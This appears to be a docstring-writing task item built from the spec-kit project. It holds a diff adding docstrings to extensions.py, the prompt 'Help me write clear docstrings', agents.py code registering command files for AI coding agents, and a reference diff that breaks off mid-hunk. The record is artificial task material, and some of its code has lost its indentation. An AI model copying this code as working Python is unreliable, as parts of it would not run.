+ """Check if current version satisfies required version specifier.
+
+ Args:
+ current: Current version (e.g., "0.1.5")
+ required: Required version specifier (e.g., ">=0.1.0,<2.0.0")
+
+ Returns:
+ True if version satisfies requirement
+ """
try:
current_ver = pkg_version.Version(current)
specifier = SpecifierSet(required)
@@ -545,6 +769,12 @@
class CommandRegistrar:
+ """Handles registration of extension commands with AI agents.
+
+ This is a backward-compatible wrapper around the shared CommandRegistrar
+ in agents.py. Extension-specific methods accept ExtensionManifest objects
+ and delegate to the generic API.
+ """
# Re-export AGENT_CONFIGS at class level for direct attribute access
from .agents import CommandRegistrar as _AgentRegistrar
@@ -588,6 +818,7 @@ extension_dir: Path,
project_root: Path
) -> List[str]:
+ """Register extension commands for a specific agent."""
if agent_name not in self.AGENT_CONFIGS:
raise ExtensionError(f"Unsupported agent: {agent_name}")
context_note = f"\n<!-- Extension: {manifest.id} -->\n<!-- Config: .specify/extensions/{manifest.id}/ -->\n"
@@ -602,6 +833,7 @@ extension_dir: Path,
project_root: Path
) -> Dict[str, List[str]]:
+ """Register extension commands for all detected agents."""
context_note = f"\n<!-- Extension: {manifest.id} -->\n<!-- Config: .specify/extensions/{manifest.id}/ -->\n"
return self._registrar.register_commands_for_all_agents(
manifest.commands, manifest.id, extension_dir, project_root,
@@ -613,6 +845,7 @@ registered_commands: Dict[str, List[str]],
project_root: Path
) -> None:
+ """Remove previously registered command files from agent directories."""
self._registrar.unregister_commands(registered_commands, project_root)
def register_commands_for_claude(
@@ -621,16 +854,23 @@ extension_dir: Path,
project_root: Path
) -> List[str]:
+ """Register extension commands for Claude Code agent."""
return self.register_commands_for_agent("claude", manifest, extension_dir, project_root)
class ExtensionCatalog:
+ """Manages extension catalog fetching, caching, and searching."""
DEFAULT_CATALOG_URL = "https://raw.githubusercontent.com/github/spec-kit/main/extensions/catalog.json"
COMMUNITY_CATALOG_URL = "https://raw.githubusercontent.com/github/spec-kit/main/extensions/catalog.community.json"
CACHE_DURATION = 3600 # 1 hour in seconds
def __init__(self, project_root: Path):
+ """Initialize extension catalog manager.
+
+ Args:
+ project_root: Root directory of the spec-kit project
+ """
self.project_root = project_root
self.extensions_dir = project_root / ".specify" / "extensions"
self.cache_dir = self.extensions_dir / ".cache"
@@ -638,6 +878,14 @@ self.cache_metadata_file = self.cache_dir / "catalog-metadata.json"
def _validate_catalog_url(self, url: str) -> None:
+ """Validate that a catalog URL uses HTTPS (localhost HTTP allowed).
+
+ Args:
+ url: URL to validate
+
+ Raises:
+ ValidationError: If URL is invalid or uses non-HTTPS scheme
+ """
from urllib.parse import urlparse
parsed = urlparse(url)
@@ -651,6 +899,20 @@ raise ValidationError("Catalog URL must be a valid URL with a host.")
def _load_catalog_config(self, config_path: Path) -> Optional[List[CatalogEntry]]:
+ """Load catalog stack configuration from a YAML file.
+
+ Args:
+ config_path: Path to extension-catalogs.yml
+
+ Returns:
+ Ordered list of CatalogEntry objects, or None if file doesn't exist.
+
+ Raises:
+ ValidationError: If any catalog entry has an invalid URL,
+ the file cannot be parsed, a priority value is invalid,
+ or the file exists but contains no valid catalog entries
+ (fail-closed for security).
+ """
if not config_path.exists():
return None
try:
@@ -712,6 +974,20 @@ return entries
def get_active_catalogs(self) -> List[CatalogEntry]:
+ """Get the ordered list of active catalogs.
+
+ Resolution order:
+ 1. SPECKIT_CATALOG_URL env var — single catalog replacing all defaults
+ 2. Project-level .specify/extension-catalogs.yml
+ 3. User-level ~/.specify/extension-catalogs.yml
+ 4. Built-in default stack (default + community)
+
+ Returns:
+ List of CatalogEntry objects sorted by priority (ascending)
+
+ Raises:
+ ValidationError: If a catalog URL is invalid
+ """
import sys
# 1. SPECKIT_CATALOG_URL env var replaces all defaults for backward compat
@@ -747,10 +1023,37 @@ ]
def get_catalog_url(self) -> str:
+ """Get the primary catalog URL.
+
+ Returns the URL of the highest-priority catalog. Kept for backward
+ compatibility. Use get_active_catalogs() for full multi-catalog support.
+
+ Returns:
+ URL of the primary catalog
+
+ Raises:
+ ValidationError: If a catalog URL is invalid
+ """
active = self.get_active_catalogs()
return active[0].url if active else self.DEFAULT_CATALOG_URL
def _fetch_single_catalog(self, entry: CatalogEntry, force_refresh: bool = False) -> Dict[str, Any]:
+ """Fetch a single catalog with per-URL caching.
+
+ For the DEFAULT_CATALOG_URL, uses legacy cache files (self.cache_file /
+ self.cache_metadata_file) for backward compatibility. For all other URLs,
+ uses URL-hash-based cache files in self.cache_dir.
+
+ Args:
+ entry: CatalogEntry describing the catalog to fetch
+ force_refresh: If True, bypass cache
+
+ Returns:
+ Catalog data dictionary
+
+ Raises:
+ ExtensionError: If catalog cannot be fetched or has invalid format
+ """
import urllib.request
import urllib.error
@@ -807,6 +1110,25 @@ raise ExtensionError(f"Invalid JSON in catalog from {entry.url}: {e}")
def _get_merged_extensions(self, force_refresh: bool = False) -> List[Dict[str, Any]]:
+ """Fetch and merge extensions from all active catalogs.
+
+ Higher-priority (lower priority number) catalogs win on conflicts
+ (same extension id in two catalogs). Each extension dict is annotated with:
+ - _catalog_name: name of the source catalog
+ - _install_allowed: whether installation is allowed from this catalog
+
+ Catalogs that fail to fetch are skipped. Raises ExtensionError only if
+ ALL catalogs fail.
+
+ Args:
+ force_refresh: If True, bypass all caches
+
+ Returns:
+ List of merged extension dicts
+
+ Raises:
+ ExtensionError: If all catalogs fail to fetch
+ """
import sys
active_catalogs = self.get_active_catalogs()
@@ -839,6 +1161,11 @@ return list(merged.values())
def is_cache_valid(self) -> bool:
+ """Check if cached catalog is still valid.
+
+ Returns:
+ True if cache exists and is within cache duration
+ """
if not self.cache_file.exists() or not self.cache_metadata_file.exists():
return False
@@ -853,6 +1180,17 @@ return False
def fetch_catalog(self, force_refresh: bool = False) -> Dict[str, Any]:
+ """Fetch extension catalog from URL or cache.
+
+ Args:
+ force_refresh: If True, bypass cache and fetch from network
+
+ Returns:
+ Catalog data dictionary
+
+ Raises:
+ ExtensionError: If catalog cannot be fetched
+ """
# Check cache first unless force refresh
if not force_refresh and self.is_cache_valid():
try:
@@ -899,6 +1237,18 @@ author: Optional[str] = None,
verified_only: bool = False,
) -> List[Dict[str, Any]]:
+ """Search catalog for extensions across all active catalogs.
+
+ Args:
+ query: Search query (searches name, description, tags)
+ tag: Filter by specific tag
+ author: Filter by author name
+ verified_only: If True, show only verified extensions
+
+ Returns:
+ List of matching extension metadata, each annotated with
+ ``_catalog_name`` and ``_install_allowed`` from its source catalog.
+ """
all_extensions = self._get_merged_extensions()
results = []
@@ -936,6 +1286,17 @@ return results
def get_extension_info(self, extension_id: str) -> Optional[Dict[str, Any]]:
+ """Get detailed information about a specific extension.
+
+ Searches all active catalogs in priority order.
+
+ Args:
+ extension_id: ID of the extension
+
+ Returns:
+ Extension metadata (annotated with ``_catalog_name`` and
+ ``_install_allowed``) or None if not found.
+ """
all_extensions = self._get_merged_extensions()
for ext_data in all_extensions:
if ext_data["id"] == extension_id:
@@ -943,6 +1304,18 @@ return None
def download_extension(self, extension_id: str, target_dir: Optional[Path] = None) -> Path:
+ """Download extension ZIP from catalog.
+
+ Args:
+ extension_id: ID of the extension to download
+ target_dir: Directory to save ZIP file (defaults to temp directory)
+
+ Returns:
+ Path to downloaded ZIP file
+
+ Raises:
+ ExtensionError: If extension not found or download fails
+ """
import urllib.request
import urllib.error
@@ -987,6 +1360,7 @@ raise ExtensionError(f"Failed to save extension ZIP: {e}")
def clear_cache(self):
+ """Clear the catalog cache (both legacy and URL-hash-based files)."""
if self.cache_file.exists():
self.cache_file.unlink()
if self.cache_metadata_file.exists():
@@ -1001,13 +1375,35 @@
class ConfigManager:
+ """Manages layered configuration for extensions.
+
+ Configuration layers (in order of precedence from lowest to highest):
+ 1. Defaults (from extension.yml)
+ 2. Project config (.specify/extensions/{ext-id}/{ext-id}-config.yml)
+ 3. Local config (.specify/extensions/{ext-id}/local-config.yml) - gitignored
+ 4. Environment variables (SPECKIT_{EXT_ID}_{KEY})
+ """
def __init__(self, project_root: Path, extension_id: str):
+ """Initialize config manager for an extension.
+
+ Args:
+ project_root: Root directory of the spec-kit project
+ extension_id: ID of the extension
+ """
self.project_root = project_root
self.extension_id = extension_id
self.extension_dir = project_root / ".specify" / "extensions" / extension_id
def _load_yaml_config(self, file_path: Path) -> Dict[str, Any]:
+ """Load configuration from YAML file.
+
+ Args:
+ file_path: Path to YAML file
+
+ Returns:
+ Configuration dictionary
+ """
if not file_path.exists():
return {}
@@ -1017,6 +1413,11 @@ return {}
def _get_extension_defaults(self) -> Dict[str, Any]:
+ """Get default configuration from extension manifest.
+
+ Returns:
+ Default configuration dictionary
+ """
manifest_path = self.extension_dir / "extension.yml"
if not manifest_path.exists():
return {}
@@ -1025,14 +1426,36 @@ return manifest_data.get("config", {}).get("defaults", {})
def _get_project_config(self) -> Dict[str, Any]:
+ """Get project-level configuration.
+
+ Returns:
+ Project configuration dictionary
+ """
config_file = self.extension_dir / f"{self.extension_id}-config.yml"
return self._load_yaml_config(config_file)
def _get_local_config(self) -> Dict[str, Any]:
+ """Get local configuration (gitignored, machine-specific).
+
+ Returns:
+ Local configuration dictionary
+ """
config_file = self.extension_dir / "local-config.yml"
return self._load_yaml_config(config_file)
def _get_env_config(self) -> Dict[str, Any]:
+ """Get configuration from environment variables.
+
+ Environment variables follow the pattern:
+ SPECKIT_{EXT_ID}_{SECTION}_{KEY}
+
+ For example:
+ - SPECKIT_JIRA_CONNECTION_URL
+ - SPECKIT_JIRA_PROJECT_KEY
+
+ Returns:
+ Configuration dictionary from environment variables
+ """
import os
env_config = {}
@@ -1059,6 +1482,15 @@ return env_config
def _merge_configs(self, base: Dict[str, Any], override: Dict[str, Any]) -> Dict[str, Any]:
+ """Recursively merge two configuration dictionaries.
+
+ Args:
+ base: Base configuration
+ override: Configuration to merge on top
+
+ Returns:
+ Merged configuration
+ """
result = base.copy()
for key, value in override.items():
@@ -1072,6 +1504,14 @@ return result
def get_config(self) -> Dict[str, Any]:
+ """Get final merged configuration for the extension.
+
+ Merges configuration layers in order:
+ defaults -> project -> local -> env
+
+ Returns:
+ Final merged configuration dictionary
+ """
# Start with defaults
config = self._get_extension_defaults()
@@ -1087,6 +1527,20 @@ return config
def get_value(self, key_path: str, default: Any = None) -> Any:
+ """Get a specific configuration value by dot-notation path.
+
+ Args:
+ key_path: Dot-separated path to config value (e.g., "connection.url")
+ default: Default value if key not found
+
+ Returns:
+ Configuration value or default
+
+ Example:
+ >>> config = ConfigManager(project_root, "jira")
+ >>> url = config.get_value("connection.url")
+ >>> timeout = config.get_value("connection.timeout", 30)
+ """
config = self.get_config()
keys = key_path.split(".")
@@ -1099,6 +1553,14 @@ return current
def has_value(self, key_path: str) -> bool:
+ """Check if a configuration value exists.
+
+ Args:
+ key_path: Dot-separated path to config value
+
+ Returns:
+ True if value exists (even if None), False otherwise
+ """
config = self.get_config()
keys = key_path.split(".")
@@ -1112,13 +1574,24 @@
class HookExecutor:
+ """Manages extension hook execution."""
def __init__(self, project_root: Path):
+ """Initialize hook executor.
+
+ Args:
+ project_root: Root directory of the spec-kit project
+ """
self.project_root = project_root
self.extensions_dir = project_root / ".specify" / "extensions"
self.config_file = project_root / ".specify" / "extensions.yml"
def get_project_config(self) -> Dict[str, Any]:
+ """Load project-level extension configuration.
+
+ Returns:
+ Extension configuration dictionary
+ """
if not self.config_file.exists():
return {
"installed": [],
@@ -1136,12 +1609,22 @@ }
def save_project_config(self, config: Dict[str, Any]):
+ """Save project-level extension configuration.
+
+ Args:
+ config: Configuration dictionary to save
+ """
self.config_file.parent.mkdir(parents=True, exist_ok=True)
self.config_file.write_text(
yaml.dump(config, default_flow_style=False, sort_keys=False)
)
def register_hooks(self, manifest: ExtensionManifest):
+ """Register extension hooks in project config.
+
+ Args:
+ manifest: Extension manifest with hooks to register
+ """
if not hasattr(manifest, "hooks") or not manifest.hooks:
return
@@ -1187,6 +1670,11 @@ self.save_project_config(config)
def unregister_hooks(self, extension_id: str):
+ """Remove extension hooks from project config.
+
+ Args:
+ extension_id: ID of extension to unregister
+ """
config = self.get_project_config()
if "hooks" not in config:
@@ -1208,6 +1696,14 @@ self.save_project_config(config)
def get_hooks_for_event(self, event_name: str) -> List[Dict[str, Any]]:
+ """Get all registered hooks for a specific event.
+
+ Args:
+ event_name: Name of the event (e.g., 'after_tasks')
+
+ Returns:
+ List of hook configurations
+ """
config = self.get_project_config()
hooks = config.get("hooks", {}).get(event_name, [])
@@ -1215,6 +1711,14 @@ return [h for h in hooks if h.get("enabled", True)]
def should_execute_hook(self, hook: Dict[str, Any]) -> bool:
+ """Determine if a hook should be executed based on its condition.
+
+ Args:
+ hook: Hook configuration
+
+ Returns:
+ True if hook should execute, False otherwise
+ """
condition = hook.get("condition")
if not condition:
@@ -1228,6 +1732,22 @@ return False
def _evaluate_condition(self, condition: str, extension_id: Optional[str]) -> bool:
+ """Evaluate a hook condition expression.
+
+ Supported condition patterns:
+ - "config.key.path is set" - checks if config value exists
+ - "config.key.path == 'value'" - checks if config equals value
+ - "config.key.path != 'value'" - checks if config not equals value
+ - "env.VAR_NAME is set" - checks if environment variable exists
+ - "env.VAR_NAME == 'value'" - checks if env var equals value
+
+ Args:
+ condition: Condition expression string
+ extension_id: Extension ID for config lookup
+
+ Returns:
+ True if condition is met, False otherwise
+ """
import os
condition = condition.strip()
@@ -1289,6 +1809,15 @@ def format_hook_message(
self, event_name: str, hooks: List[Dict[str, Any]]
) -> str:
+ """Format hook execution message for display in command output.
+
+ Args:
+ event_name: Name of the event
+ hooks: List of hooks to execute
+
+ Returns:
+ Formatted message string
+ """
if not hooks:
return ""
@@ -1317,6 +1846,19 @@ return "\n".join(lines)
def check_hooks_for_event(self, event_name: str) -> Dict[str, Any]:
+ """Check for hooks registered for a specific event.
+
+ This method is designed to be called by AI agents after core commands complete.
+
+ Args:
+ event_name: Name of the event (e.g., 'after_spec', 'after_tasks')
+
+ Returns:
+ Dictionary with hook information:
+ - has_hooks: bool - Whether hooks exist for this event
+ - hooks: List[Dict] - List of hooks (with condition evaluation applied)
+ - message: str - Formatted message for display
+ """
hooks = self.get_hooks_for_event(event_name)
if not hooks:
@@ -1346,6 +1888,21 @@ }
def execute_hook(self, hook: Dict[str, Any]) -> Dict[str, Any]:
+ """Execute a single hook command.
+
+ Note: This returns information about how to execute the hook.
+ The actual execution is delegated to the AI agent.
+
+ Args:
+ hook: Hook configuration
+
+ Returns:
+ Dictionary with execution information:
+ - command: str - Command to execute
+ - extension: str - Extension ID
+ - optional: bool - Whether hook is optional
+ - description: str - Hook description
+ """
return {
"command": hook.get("command"),
"extension": hook.get("extension"),
@@ -1355,6 +1912,11 @@ }
def enable_hooks(self, extension_id: str):
+ """Enable all hooks for an extension.
+
+ Args:
+ extension_id: Extension ID
+ """
config = self.get_project_config()
if "hooks" not in config:
@@ -1369,6 +1931,11 @@ self.save_project_config(config)
def disable_hooks(self, extension_id: str):
+ """Disable all hooks for an extension.
+
+ Args:
+ extension_id: Extension ID
+ """
config = self.get_project_config()
if "hooks" not in config:
@@ -1381,3 +1948,4 @@ hook["enabled"] = False
self.save_project_config(config)
+
| https://raw.githubusercontent.com/github/spec-kit/HEAD/src/specify_cli/extensions.py |
Help me write clear docstrings |
from pathlib import Path
from typing import Dict, List, Any
import yaml
class CommandRegistrar:
    """Writes extension/preset command files into per-agent directories.

    Each supported AI agent loads commands from its own directory and file
    format; AGENT_CONFIGS captures those per-agent differences so that the
    registration methods can stay agent-agnostic.
    """

    # Agent configurations with directory, format, and argument placeholder.
    # Schema per agent:
    #   dir       — project-relative directory the agent loads commands from
    #   format    — rendered output format: "markdown" or "toml"
    #   args      — the agent's argument placeholder token ($ARGUMENTS in the
    #               source templates is rewritten to this)
    #   extension — suffix appended to the command name to form the file name
    #               (kimi uses "/SKILL.md", i.e. a per-command directory
    #               containing a SKILL.md file)
    AGENT_CONFIGS = {
        "claude": {
            "dir": ".claude/commands",
            "format": "markdown",
            "args": "$ARGUMENTS",
            "extension": ".md"
        },
        "gemini": {
            "dir": ".gemini/commands",
            "format": "toml",
            "args": "{{args}}",
            "extension": ".toml"
        },
        "copilot": {
            "dir": ".github/agents",
            "format": "markdown",
            "args": "$ARGUMENTS",
            "extension": ".agent.md"
        },
        "cursor": {
            "dir": ".cursor/commands",
            "format": "markdown",
            "args": "$ARGUMENTS",
            "extension": ".md"
        },
        "qwen": {
            "dir": ".qwen/commands",
            "format": "markdown",
            "args": "$ARGUMENTS",
            "extension": ".md"
        },
        "opencode": {
            "dir": ".opencode/command",
            "format": "markdown",
            "args": "$ARGUMENTS",
            "extension": ".md"
        },
        "codex": {
            "dir": ".codex/prompts",
            "format": "markdown",
            "args": "$ARGUMENTS",
            "extension": ".md"
        },
        "windsurf": {
            "dir": ".windsurf/workflows",
            "format": "markdown",
            "args": "$ARGUMENTS",
            "extension": ".md"
        },
        "kilocode": {
            "dir": ".kilocode/workflows",
            "format": "markdown",
            "args": "$ARGUMENTS",
            "extension": ".md"
        },
        "auggie": {
            "dir": ".augment/commands",
            "format": "markdown",
            "args": "$ARGUMENTS",
            "extension": ".md"
        },
        "roo": {
            "dir": ".roo/commands",
            "format": "markdown",
            "args": "$ARGUMENTS",
            "extension": ".md"
        },
        "codebuddy": {
            "dir": ".codebuddy/commands",
            "format": "markdown",
            "args": "$ARGUMENTS",
            "extension": ".md"
        },
        "qodercli": {
            "dir": ".qoder/commands",
            "format": "markdown",
            "args": "$ARGUMENTS",
            "extension": ".md"
        },
        "kiro-cli": {
            "dir": ".kiro/prompts",
            "format": "markdown",
            "args": "$ARGUMENTS",
            "extension": ".md"
        },
        "pi": {
            "dir": ".pi/prompts",
            "format": "markdown",
            "args": "$ARGUMENTS",
            "extension": ".md"
        },
        "amp": {
            "dir": ".agents/commands",
            "format": "markdown",
            "args": "$ARGUMENTS",
            "extension": ".md"
        },
        "shai": {
            "dir": ".shai/commands",
            "format": "markdown",
            "args": "$ARGUMENTS",
            "extension": ".md"
        },
        "tabnine": {
            "dir": ".tabnine/agent/commands",
            "format": "toml",
            "args": "{{args}}",
            "extension": ".toml"
        },
        "bob": {
            "dir": ".bob/commands",
            "format": "markdown",
            "args": "$ARGUMENTS",
            "extension": ".md"
        },
        "kimi": {
            "dir": ".kimi/skills",
            "format": "markdown",
            "args": "$ARGUMENTS",
            "extension": "/SKILL.md"
        },
        "trae": {
            "dir": ".trae/rules",
            "format": "markdown",
            "args": "$ARGUMENTS",
            "extension": ".md"
        }
    }
@staticmethod
def parse_frontmatter(content: str) -> tuple[dict, str]:
if not content.startswith("---"):
return {}, content
# Find second ---
end_marker = content.find("---", 3)
if end_marker == -1:
return {}, content
frontmatter_str = content[3:end_marker].strip()
body = content[end_marker + 3:].strip()
try:
frontmatter = yaml.safe_load(frontmatter_str) or {}
except yaml.YAMLError:
frontmatter = {}
return frontmatter, body
@staticmethod
def render_frontmatter(fm: dict) -> str:
if not fm:
return ""
yaml_str = yaml.dump(fm, default_flow_style=False, sort_keys=False)
return f"---\n{yaml_str}---\n"
def _adjust_script_paths(self, frontmatter: dict) -> dict:
if "scripts" in frontmatter:
for key in frontmatter["scripts"]:
script_path = frontmatter["scripts"][key]
if script_path.startswith("../../scripts/"):
frontmatter["scripts"][key] = f".specify/scripts/{script_path[14:]}"
return frontmatter
def render_markdown_command(
    self,
    frontmatter: dict,
    body: str,
    source_id: str,
    context_note: str = None
) -> str:
    """Assemble a Markdown command file: frontmatter, context note, body.

    Args:
        frontmatter: Frontmatter mapping rendered at the top of the file.
        body: Command body text.
        source_id: Identifier embedded in the default context note.
        context_note: Custom comment inserted between frontmatter and body;
            defaults to a "<!-- Source: {source_id} -->" marker.

    Returns:
        Complete Markdown command file content.
    """
    note = context_note if context_note is not None else f"\n<!-- Source: {source_id} -->\n"
    rendered_header = self.render_frontmatter(frontmatter)
    return rendered_header + "\n" + note + body
def render_toml_command(
    self,
    frontmatter: dict,
    body: str,
    source_id: str
) -> str:
    """Render a command as a TOML command file (gemini/tabnine format).

    Fixes: the original escaped only double quotes in the description, so a
    backslash in the description produced an invalid TOML escape sequence
    (e.g. ``\\b``). Backslashes are now escaped before quotes.

    Args:
        frontmatter: Frontmatter mapping; only "description" is used.
        body: Command body placed into the multi-line ``prompt`` string.
        source_id: Identifier written as a "# Source:" comment.

    Returns:
        TOML file content with optional description, source comment, and prompt.
    """
    toml_lines = []
    if "description" in frontmatter:
        # Escape backslashes first, then quotes, so a literal backslash in the
        # description cannot form an accidental TOML escape sequence.
        desc = frontmatter["description"].replace("\\", "\\\\").replace('"', '\\"')
        toml_lines.append(f'description = "{desc}"')
        toml_lines.append("")
    toml_lines.append(f"# Source: {source_id}")
    toml_lines.append("")
    # NOTE(review): a body containing a literal `"""` would still break the
    # multi-line string below; no shipped template does this — confirm.
    toml_lines.append('prompt = """')
    toml_lines.append(body)
    toml_lines.append('"""')
    return "\n".join(toml_lines)
def _convert_argument_placeholder(self, content: str, from_placeholder: str, to_placeholder: str) -> str:
return content.replace(from_placeholder, to_placeholder)
def register_commands(
    self,
    agent_name: str,
    commands: List[Dict[str, Any]],
    source_id: str,
    source_dir: Path,
    project_root: Path,
    context_note: str = None
) -> List[str]:
    """Write command files for one agent and return the registered names.

    Args:
        agent_name: Key into AGENT_CONFIGS (claude, gemini, copilot, ...).
        commands: Command descriptors; each needs "name" and "file" and may
            carry an "aliases" list of extra names to register.
        source_id: Identifier of the source (extension/preset) embedded in
            the rendered output.
        source_dir: Directory containing the command template files.
        project_root: Project root under which agent directories live.
        context_note: Optional custom markdown comment for the output.

    Returns:
        List of command names (including aliases) actually written;
        descriptors whose source file is missing are silently skipped.

    Raises:
        ValueError: If agent_name is unknown or its configured format is
            unsupported.
    """
    if agent_name not in self.AGENT_CONFIGS:
        raise ValueError(f"Unsupported agent: {agent_name}")

    agent_config = self.AGENT_CONFIGS[agent_name]
    commands_dir = project_root / agent_config["dir"]
    commands_dir.mkdir(parents=True, exist_ok=True)

    registered = []
    for cmd_info in commands:
        cmd_name = cmd_info["name"]
        cmd_file = cmd_info["file"]
        source_file = source_dir / cmd_file
        # Missing template files are skipped rather than treated as errors.
        if not source_file.exists():
            continue

        content = source_file.read_text(encoding="utf-8")
        frontmatter, body = self.parse_frontmatter(content)
        frontmatter = self._adjust_script_paths(frontmatter)
        # Rewrite the generic $ARGUMENTS token to the agent's own placeholder.
        body = self._convert_argument_placeholder(
            body, "$ARGUMENTS", agent_config["args"]
        )

        if agent_config["format"] == "markdown":
            output = self.render_markdown_command(frontmatter, body, source_id, context_note)
        elif agent_config["format"] == "toml":
            output = self.render_toml_command(frontmatter, body, source_id)
        else:
            raise ValueError(f"Unsupported format: {agent_config['format']}")

        dest_file = commands_dir / f"{cmd_name}{agent_config['extension']}"
        # parent.mkdir handles nested layouts (e.g. kimi's "/SKILL.md" suffix).
        dest_file.parent.mkdir(parents=True, exist_ok=True)
        dest_file.write_text(output, encoding="utf-8")
        # Copilot also needs a companion .prompt.md stub per command.
        if agent_name == "copilot":
            self.write_copilot_prompt(project_root, cmd_name)
        registered.append(cmd_name)

        # Aliases receive an identical copy of the rendered command.
        for alias in cmd_info.get("aliases", []):
            alias_file = commands_dir / f"{alias}{agent_config['extension']}"
            alias_file.parent.mkdir(parents=True, exist_ok=True)
            alias_file.write_text(output, encoding="utf-8")
            if agent_name == "copilot":
                self.write_copilot_prompt(project_root, alias)
            registered.append(alias)

    return registered
@staticmethod
def write_copilot_prompt(project_root: Path, cmd_name: str) -> None:
prompts_dir = project_root / ".github" / "prompts"
prompts_dir.mkdir(parents=True, exist_ok=True)
prompt_file = prompts_dir / f"{cmd_name}.prompt.md"
prompt_file.write_text(f"---\nagent: {cmd_name}\n---\n", encoding="utf-8")
def register_commands_for_all_agents(
    self,
    commands: List[Dict[str, Any]],
    source_id: str,
    source_dir: Path,
    project_root: Path,
    context_note: str = None
) -> Dict[str, List[str]]:
    """Register commands for every agent detected in the project.

    An agent counts as "detected" when the top-level directory of its
    configured command path exists under project_root.

    Args:
        commands: Command descriptors (see register_commands).
        source_id: Identifier of the source (extension/preset).
        source_dir: Directory containing the command template files.
        project_root: Project root directory.
        context_note: Optional custom markdown comment for the output.

    Returns:
        Mapping of agent name -> list of registered command names; agents
        with no registrations (or that raised ValueError) are omitted.
    """
    results = {}
    for agent_name, agent_config in self.AGENT_CONFIGS.items():
        top_level = agent_config["dir"].split("/")[0]
        if not (project_root / top_level).exists():
            continue
        try:
            names = self.register_commands(
                agent_name, commands, source_id, source_dir, project_root,
                context_note=context_note
            )
        except ValueError:
            # An unsupported agent/format must not abort the others.
            continue
        if names:
            results[agent_name] = names
    return results
def unregister_commands(
    self,
    registered_commands: Dict[str, List[str]],
    project_root: Path
) -> None:
    """Delete previously written command files (and Copilot prompt stubs).

    Args:
        registered_commands: Mapping of agent name -> command names, as
            returned by register_commands_for_all_agents.
        project_root: Project root directory.
    """
    for agent_name, cmd_names in registered_commands.items():
        # Agents no longer present in AGENT_CONFIGS are silently skipped.
        if agent_name not in self.AGENT_CONFIGS:
            continue
        agent_config = self.AGENT_CONFIGS[agent_name]
        commands_dir = project_root / agent_config["dir"]
        for cmd_name in cmd_names:
            cmd_file = commands_dir / f"{cmd_name}{agent_config['extension']}"
            if cmd_file.exists():
                cmd_file.unlink()
            # Copilot also wrote a companion .prompt.md stub; remove it too.
            if agent_name == "copilot":
                prompt_file = project_root / ".github" / "prompts" / f"{cmd_name}.prompt.md"
                if prompt_file.exists():
prompt_file.unlink() | --- +++ @@ -1,3 +1,10 @@+"""
+Agent Command Registrar for Spec Kit
+
+Shared infrastructure for registering commands with AI agents.
+Used by both the extension system and the preset system to write
+command files into agent-specific directories in the correct format.
+"""
from pathlib import Path
from typing import Dict, List, Any
@@ -6,6 +13,12 @@
class CommandRegistrar:
+ """Handles registration of commands with AI agents.
+
+ Supports writing command files in Markdown or TOML format to the
+ appropriate agent directory, with correct argument placeholders
+ and companion files (e.g. Copilot .prompt.md).
+ """
# Agent configurations with directory, format, and argument placeholder
AGENT_CONFIGS = {
@@ -139,6 +152,14 @@
@staticmethod
def parse_frontmatter(content: str) -> tuple[dict, str]:
+ """Parse YAML frontmatter from Markdown content.
+
+ Args:
+ content: Markdown content with YAML frontmatter
+
+ Returns:
+ Tuple of (frontmatter_dict, body_content)
+ """
if not content.startswith("---"):
return {}, content
@@ -159,6 +180,14 @@
@staticmethod
def render_frontmatter(fm: dict) -> str:
+ """Render frontmatter dictionary as YAML.
+
+ Args:
+ fm: Frontmatter dictionary
+
+ Returns:
+ YAML-formatted frontmatter with delimiters
+ """
if not fm:
return ""
@@ -166,6 +195,14 @@ return f"---\n{yaml_str}---\n"
def _adjust_script_paths(self, frontmatter: dict) -> dict:
+ """Adjust script paths from extension-relative to repo-relative.
+
+ Args:
+ frontmatter: Frontmatter dictionary
+
+ Returns:
+ Modified frontmatter with adjusted paths
+ """
if "scripts" in frontmatter:
for key in frontmatter["scripts"]:
script_path = frontmatter["scripts"][key]
@@ -180,6 +217,17 @@ source_id: str,
context_note: str = None
) -> str:
+ """Render command in Markdown format.
+
+ Args:
+ frontmatter: Command frontmatter
+ body: Command body content
+ source_id: Source identifier (extension or preset ID)
+ context_note: Custom context comment (default: <!-- Source: {source_id} -->)
+
+ Returns:
+ Formatted Markdown command file content
+ """
if context_note is None:
context_note = f"\n<!-- Source: {source_id} -->\n"
return self.render_frontmatter(frontmatter) + "\n" + context_note + body
@@ -190,6 +238,16 @@ body: str,
source_id: str
) -> str:
+ """Render command in TOML format.
+
+ Args:
+ frontmatter: Command frontmatter
+ body: Command body content
+ source_id: Source identifier (extension or preset ID)
+
+ Returns:
+ Formatted TOML command file content
+ """
toml_lines = []
if "description" in frontmatter:
@@ -207,6 +265,16 @@ return "\n".join(toml_lines)
def _convert_argument_placeholder(self, content: str, from_placeholder: str, to_placeholder: str) -> str:
+ """Convert argument placeholder format.
+
+ Args:
+ content: Command content
+ from_placeholder: Source placeholder (e.g., "$ARGUMENTS")
+ to_placeholder: Target placeholder (e.g., "{{args}}")
+
+ Returns:
+ Content with converted placeholders
+ """
return content.replace(from_placeholder, to_placeholder)
def register_commands(
@@ -218,6 +286,22 @@ project_root: Path,
context_note: str = None
) -> List[str]:
+ """Register commands for a specific agent.
+
+ Args:
+ agent_name: Agent name (claude, gemini, copilot, etc.)
+ commands: List of command info dicts with 'name', 'file', and optional 'aliases'
+ source_id: Identifier of the source (extension or preset ID)
+ source_dir: Directory containing command source files
+ project_root: Path to project root
+ context_note: Custom context comment for markdown output
+
+ Returns:
+ List of registered command names
+
+ Raises:
+ ValueError: If agent is not supported
+ """
if agent_name not in self.AGENT_CONFIGS:
raise ValueError(f"Unsupported agent: {agent_name}")
@@ -272,6 +356,12 @@
@staticmethod
def write_copilot_prompt(project_root: Path, cmd_name: str) -> None:
+ """Generate a companion .prompt.md file for a Copilot agent command.
+
+ Args:
+ project_root: Path to project root
+ cmd_name: Command name (e.g. 'speckit.my-ext.example')
+ """
prompts_dir = project_root / ".github" / "prompts"
prompts_dir.mkdir(parents=True, exist_ok=True)
prompt_file = prompts_dir / f"{cmd_name}.prompt.md"
@@ -285,6 +375,18 @@ project_root: Path,
context_note: str = None
) -> Dict[str, List[str]]:
+ """Register commands for all detected agents in the project.
+
+ Args:
+ commands: List of command info dicts
+ source_id: Identifier of the source (extension or preset ID)
+ source_dir: Directory containing command source files
+ project_root: Path to project root
+ context_note: Custom context comment for markdown output
+
+ Returns:
+ Dictionary mapping agent names to list of registered commands
+ """
results = {}
for agent_name, agent_config in self.AGENT_CONFIGS.items():
@@ -308,6 +410,12 @@ registered_commands: Dict[str, List[str]],
project_root: Path
) -> None:
+ """Remove previously registered command files from agent directories.
+
+ Args:
